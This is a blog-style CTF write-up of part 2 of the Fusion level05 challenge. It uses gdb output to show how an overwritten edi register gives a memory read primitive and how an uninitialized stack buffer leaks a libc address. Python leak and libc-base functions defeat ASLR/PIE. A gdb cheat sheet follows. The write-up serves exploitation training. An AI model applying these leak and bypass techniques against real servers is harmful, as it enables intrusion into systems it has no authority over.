Fusion 5 Part 2

A short recap

We are working on a server with ASLR and PIE. The server do not fork for every new connection, Our solution must be reliable and cannot crash the server.  Last time We wrote a client for this server, found 2 buffer overflows, one of them was actually usable. We control the values of ebp, esi, edi and eip. And of course we control the stack.

Our Plan:

  1. Find a buffer overflow
  2. Find a memory read primitive
  3. Find a memory write primitive
  4. Find libc
  5. Find a stack/heap buffer we control

Lets look at that buffer overflow again, I want to see what we are overflowing with our overflow. So I place a breakpoint on get_and_hash and print the saved registers we overflow.

Breakpoint 2, get_and_hash (maxsz=0, string=0xb7805380 "\203\354\034\213D$ \213\220\224\003", 
 separator=-1217833557) at level05/level05.c:115
115 level05/level05.c: No such file or directory.
 in level05/level05.c
1: x/5i $eip
=> 0xb7803720 <get_and_hash>: push ebp
 0xb7803721 <get_and_hash+1>: xor eax,eax
 0xb7803723 <get_and_hash+3>: push edi
 0xb7803724 <get_and_hash+4>: push esi
 0xb7803725 <get_and_hash+5>: sub esp,0x2c
(gdb) x/s $ebp
0xb78037c0 <checkname>: "\203\354\034\211t$\024\213t$ \211\\$\020\350\223\364\377\377\201\303H9"
(gdb) x/s $esi
0xb8a0c850: "\004"
(gdb) x/s $edi
0xb8a0c860: 'a' <repeats 50 times>

hmm, $edi point to our buffer (The name we use for checkname). Lets look on the function checkname that calls get_and_hash

Can you explain what $edi is used for?

Edi contains the address of our buffer as we have seen, and it is passed as a parameter to the function get_and_hash on the stack. It is also used as the parameter for the %s in the call to the function fdprintf. The compiler assumes the value of $edi is not changed by the function get_and_hash. And that it can assume that the same value in $edi at the beginning of the function get_and_hash will stay there at the end of it. It assumes it because of something called a “calling convention” basically it is convention on what what register a called function may change, what registers it may not change and where do you pass the function arguments and return value from the function.

Because $edi is a callee saved register, the calle function (get_and_hash) had to save it on the stack and pop it back out before returning to the caller function. Because it was on the stack we could change its value.

The fact that we can control the value of $edi, means that we can read any address we want in the memory space. As long as we know that the address is mapped and that our program will not crash on reading it 🙂 I will call it memory read primitive 🙂

What’s next?

It is import to know that right now this read primitive is useless. As long as we don’t know what we would like to read. If we try to read an unmapped address The server will crash.

I gave it hard and long thought for a few days, and I figure out that as long as ASLR and PIE are active, I can’t do anything much. I think about trying a partial overflow of return address (only changing the lower byte of the return address), It is possible. And it will allow me to return into any address withing the 256 bytes range of the original return address of this function. I couldn’t find any useful address in this range. I could overflow 2 lower bytes of the return address which would allow me 256^2 possible return address to search for. But, ASLR and PIE both works in a resolution of a memory page. (In This platform the size of a memory page is 0x1000 bytes. In newer Iphones for example it’s 0x4000 bytes). Anyway, I can’t overflow 1.5 bytes and when I overflow 2 bytes I might hit an unmapped address and cause a crash.

I keep thinking about it for a few more days, And couldn’t find any new directions to look at. I try to play with the client a little bit and then

An unexpected breakthrough

After sending this command:

print send_checkname_command(s, "a" * 10)

I get this output:

$ python fusion5.py 
** welcome to level05 **
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa is not indexed already

Something is off here. I can swear that there are more than 10 a’s in the output. I try it with 10 b’s and I get:

bbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaa is not indexed already

It takes me some time and some more playing with the program but I conclude that one of the buffers that the program is using is not being zeroed before usages. I use my gdb powerz, and figure out that inside the function childtask the buffer “char buffer[512]” is not being zeroed before usage , and we might be able to read whatever garbage is on the stack immediately after the name we input (Until we encounter a ‘\0’). This is where I start a few long days of trying to figure out what is on this stack and where. If we can cause this bug to output any useful address, this kind of bug is called an info-leak

Triggering the info-leak

The first thing I do is connect with a debugger and try to figure out if there is anything useful on the stack when this function is being called.

1: x/2i $eip
=> 0xb77ade4e <childtask+478>: call 0xb77ad7f0 <__strdup@plt>
 0xb77ade53 <childtask+483>: mov DWORD PTR [esi+0x4],eax

(gdb) x/32bx *(int*) $esp
0xb7bb75ca: 0x62 0x62 0x62 0x62 0x62 0x62 0x62 0x62
0xb7bb75d2: 0x62 0x62 0x00 0x00 0x00 0x00 0x00 0x00
0xb7bb75da: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xb7bb75e2: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

We don’t see anything useful after our 10 b’s. (0x62 is ‘b’)

My next thought is that maybe after I will use the program with some other features of the server, this stack buffer are will be filled and then I will be able to access some data on it. (Impossible if you think about it, the “char buffer[512]” from the function childtask can not be affected by function that childtask is calling. ) The only hope is that It can be affected by something that happens before the function childtask is started.

We need to think of some kind of weird behavior that can cause us to get a different stack (or the same Stack after it has been filled with data). I guess the most obvious idea is to try to keep a few connections working in the same time.  Unfortunately this server will not handle our second request while the first task is waiting for input. And this is exactly the difference between tasks and threads. We don’t have a scheduler to simulate execution of both tasks in the same time. The second task will not run until the “main” (= childtask) of the returns.

I write the following functions:

def try_to_leak_data(length): 
  s = setup_session() 
  s.recv(100) 
 
  data = send_checkname_command(s, "A" * length) 
  data = data[length:] 
  data = data[:-len(" is not indexed already.")] 
 
  return data 
 
def search_for_data_leak(length, retries): 
  leaked_data = None 
  for i in range(retries): 
    data = try_to_leak_data(length) 
    if len(data) &gt;= 4: 
      print i, data.encode("hex") 
      leaked_data = data[:4] 
      break 
  return leaked_data 
 
def main(): 
  print hex(buffer_to_address(search_for_data_leak(10,100))) 

I run it a few times. Sometimes it works giving me an output like this:

$ python ./fusion5.py 
15 38747eb723
0xb77e7438

Notice that 15 is the number of iterations needed to get this data (out of maximum 100 tries). After it worked once. the second time I run it I get the same output but in iteration number 0. And after I kill the server and restart it sometimes I can’t leak any info from it.

anyway let’s explore this address I can sometimes leak from the server:

(gdb) x/1wx 0xb77e7438
0xb77e7438 <main_arena+56>: 0xb93b9598

With “info proc map”, in gdb I confirm that this address is in libc!

After some more restarting the server and running my script I find out that I can get this address in libc about 1/3 of the times

Finding libc

Of course 1/3 of the times is not good enough. I keep trying different lengths for the buffer I send (Essentially searching on the stack in different offsets) . And after some more trial and error I find out that if I will try to length 2, 6, 10 I will always get an address by doing it.

The thing is, I get different addresses every time I restart the server. (And cause ASLR to randomize the address space). Remember how I said ASLR only works at the resolution of a memory page? I wasn’t kidding about it 🙂 Anyway, I figured out that every time I get an address that ends with 0x438, I can subtract 0x179438. and get the load address of libc. In the same way I mapped about 10 different offsets withing pages of address I got while running and restating the server. For each of these I mapped the right offset of it from libc. It is worth mentioning that some of the time I got an offset inside ld. It took me a lot of trials of exploiting the bug with the address of libc until I tested it and saw that libc is in a constants offset from ld (At least in the target VM). I ended with this function:

POSSIBLE_LEAKS_DICT = { 
  0x6ec: 0x96ec + 0x189000, 
  0x13d: 0x913d + 0x189000, 
  0xff4: 0x1eff4 + 0x189000, 
 
  0xbc8: 0x187bc8, 
  0x8d8: 0x1878d8, 
 
  0xf30: 0xcf30, 
  0x430: 0x179430, 
  0x438: 0x179438, 
} 
 
def find_libc(): 
  libc_addr = None 
  for l in [2, 6, 10]: 
    print l 
    data = search_for_data_leak(l, 10) 
    if (data is not None) and data != "AAAA": 
      addr = struct.unpack("I", data)[0] 
      print l, hex(addr) 
      lsb = addr &amp; 0xFFF 
      if lsb in POSSIBLE_LEAKS_DICT: 
        libc_addr = addr - POSSIBLE_LEAKS_DICT[lsb] 
  return libc_addr 

This function seems to find libc on every try. And it seems like a good place to stop. So to recap, we found an absolute memory read, and we found libc. Next time we will see how we can exploit these bugs. See you next time 🙂

Ultimate gdb cheat sheet

Hello boys and girls, today I will be sharing with you my cheat sheet for gdb. Hope that you will find it useful 🙂

First thing that you need to know about gdb commands is that for every word you would like to write in gdb terminal, you can type just the first few letters of it as long as it is the only word that starts like that. Use tab a lot for auto complete and always expend your cheat sheet.

Starting a debug session

start a new process (paused) with gdb attached
gdb ./binary_name
(inside gdb terminal) r/run will start the process.
attach to a by PID get debug symbols from bin_path(optional)
gdb -p <PID> <bin_path> 
will run the commands in gdbinit as gdb commands. similar to .bashrc but for gdb.
gdb -x gdbinit

basic commands

s - step (step into instruction)
si - step instruction
n - next line (step over instruction)
ni - next instruction
c - continue running the program 

p - print a variable or a register. 
    Use the same formatting as x command

i r l - info register list (prints list of registers)
i proc maps - prints a list of loaded binaries and their load addresses
info register eax - print eax

u - run until the line is greather the current line.
    good for exiting loops

fin/finish - run until a return from this function.

 Break Points

b * 0x1337 - break at an address.
b * function_name - break at function_name
b file_name:line - break at a cretine line in a file.
del break point number
del - deletes all breakpoints
i b - info breakpoint. list of breakpoints

Examining memory (de-referencing pointers)

x - print memory
x/w - print as a word (4 bytes)
x/d - print intiger
x/x - print as hex
x/i - print as instruction 
x/s - print as string
x/c - print as char
x/10s - print 10 strings

for example:
x/10s $eax - will print $eax as an array of 10 strings
x/10wx $eax - will print $eax as an array of 10 hex-words

for double deference we use casting
x/x * (int*) $eax - prints $eax as a pointer to pointer to int.

Disassemble

x/10i address - disassemble 10 instructions starting from address.
diss - disassmble current function.

 The gdbinit file

After forks, the debugger will stay with the child process and not the parent.

set follow-fork-mode child
Show Assembly in inel flavor (like you would expect after working with ida)
set disassembly-flavor intel
Show the 5 next opcodes every time the debugger stops.
display/5i $pc

Advanced shit

connects to a running process by name. run the commands in ./gdbinit. Usually I have a bash script (connect.sh) with this long line for each research project I am working on.

set -- `ps -ef | grep binary_name | grep -v defunct | head -n 1`;  gdb -x ./gdbinit --pid $2

Search for a  value in a memory range

find/<size> start_address + len, value

Add a watchpoint for an expression (program will stop every time expression changes.)

watch <expression>